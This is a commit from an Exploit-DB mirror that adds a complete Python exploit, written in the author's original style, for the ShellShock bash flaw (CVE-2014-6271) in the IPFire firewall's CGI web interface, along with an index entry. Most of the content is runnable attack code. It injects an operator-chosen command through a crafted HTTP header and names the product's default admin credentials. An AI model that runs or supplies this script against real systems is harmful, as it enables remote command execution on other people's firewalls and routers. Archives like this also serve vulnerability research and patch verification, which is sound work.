bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_06_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-06 04:44:51 +00:00
parent dbf77f5aaf
commit 63098d36da
2 changed files with 147 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -31367,6 +31367,7 @@ id,file,description,date,author,platform,type,port
34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0
34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0

Can't render this file because it is too large.

146
platforms/cgi/webapps/34839.py Executable file
View file

@ -0,0 +1,146 @@
#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
# It can be maintained via a web interface.
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
# (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys
banner = """
___ _______ _______ __ _______ __
| | _ | _ |__.----.-----. | _ .-----|__|
|. |. 1 |. 1___| | _| -__| |. 1___| _ | |
|. |. ____|. __) |__|__| |_____| |. |___|___ |__|
|: |: | |: | |: 1 |_____|
|::.|::.| |::.| |::.. . |
`---`---' `---' `-------'
_______ __ __ __ _______ __ __
| _ | |--.-----| | | _ | |--.-----.----| |--.
| 1___| | -__| | | 1___| | _ | __| <
|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
|: 1 | |: 1 |
|::.. . | |::.. . |
`-------' `-------'
IPFire <= 2.15 c0re 82 Authenticated
Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] IPFire Basic Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
response = urllib2.Request(url, None, headers)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "ipfire" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'H0m3l4b1t' in content:
print '[!] Command "'+cmd+'": INJECTED!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No IPFire page found'
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)